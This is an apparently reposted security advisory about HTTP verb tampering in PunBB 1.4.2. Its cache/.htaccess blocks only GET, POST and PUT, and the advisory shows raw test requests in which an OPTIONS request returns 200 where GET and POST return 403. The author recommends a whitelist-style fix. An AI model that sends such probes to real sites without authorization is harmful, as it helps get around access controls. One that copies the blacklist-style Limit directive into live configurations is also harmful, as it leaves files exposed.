PunBB 1.4.2 HTTP VERB Tampering

2013.04.02
Credit: AkaStep
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

=============================================================== Vulnerable software: PunBB 1.4.2 Official site: http://punbb.informer.com/ Vuln: HTTP Verb Tampering. Checked version: PunBB 1.4.2 =============================================================== About software: =============================================================== PunBB is a fast and lightweight PHP-powered discussion board. It is released under the GNU General Public License. Its primary goals are to be faster, smaller and less graphically intensive as compared to other discussion boards. PunBB has fewer features than many other discussion boards, but is generally faster and outputs smaller, semantically correct XHTML-compliant pages. *Copy/paste from official wiki.* =============================================================== About vuln: punbb-1.4.2 is vulnerable to HTTP VERB Tampering because it tries restrict HTTP access to its own cache/ directory using insecure manner. I'm pretty sure we can call the following approach : "Black listing" But as we all know black listing approach sucks as always. Take a look: ==========/punbb-1.4.2/cache/.htaccess===== <Limit GET POST PUT> Order Allow,Deny Deny from All </Limit> ===================================== Note: THIS file default shipped with latest 1.4.2 version. Other versions may also affected but i didn't checked. Using the following .htaccess file in its cache/ directory punbb denies HTTP GET,POST and PUT request(s) to the files in cache directory. But what about other HTTP method? Here is few "fingerprinting" methods against real sites:(Notice status codes) =============================================================== TEST 1: GET method REQUEST METHOD: GET URL: http://examplesite/punbb/cache/index.html Host: examplesite User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62 Connection: keep-alive Server Returns: HTTP/1.1 403 Forbidden Date: Tue, 02 Apr 2013 00:26:13 GMT Server: Apache Vary: Accept-Encoding Content-Length: 224 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /punbb/cache/index.html on this server.</p> </body></html> =============================================================== TEST 2 REQUEST METHOD: POST URL: http://examplesite/punbb/cache/index.html Host: examplesite User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62 Connection: keep-alive Content-Length: 42 $_POST data to send: &id=this is a test for HTTP VERB tampering Server Returns: HTTP/1.1 403 Forbidden Date: Tue, 02 Apr 2013 00:28:26 GMT Server: Apache Vary: Accept-Encoding Content-Length: 224 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>403 Forbidden</title> </head><body> <h1>Forbidden</h1> <p>You don't have permission to access /punbb/cache/index.html on this server.</p> </body></html> =============================================================== TEST 3: Fun begins. Request method: OPTIONS URL: http://examplesite/punbb/cache/index.html Host: examplesite User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62 Connection: keep-alive Content-Length: 0 Server returns: HTTP/1.1 200 OK <===========Notice Date: Tue, 02 Apr 2013 00:32:09 GMT Server: Apache Allow: GET,HEAD,POST,OPTIONS Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html ====================================== TEST 4: Notice again status code: 404 Method: OPTIONS URL: http://examplesite/punbb/cache/not_existense_filename_checking_notice_status_code.php Host: examplesite User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=ljls3l27pf1mo86o9nqtbqci62 Connection: keep-alive Content-Length: 0 Server returns: HTTP/1.1 404 Not Found Date: Tue, 02 Apr 2013 00:36:34 GMT Server: Apache Vary: Accept-Encoding Content-Length: 264 Keep-Alive: timeout=2, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /punbb/cache/not_existense_filename_checking_notice_status_code.php was not found on this server.</p> </body></html> ====================================== Using the following way(s) attacker may in ex: Access cache files.In itself this issuse may open new attacks/or give more chances for attacker. Do not use black listing approach instead of use whilelisting. So don't use Limit directive in your .htaccess file. In this case instead of simple *deny from all* will do it's own job.(If i'm wrong please correct me) ========================================= KUDOSSSSSSS ========================================= packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us http://exploit-db.com/ to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE *Super special KUDOS to my bro Brendan Coles! Love you and Respect you dude! Thank you!* =========================================== /AkaStep

References:

http://punbb.informer.com/


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top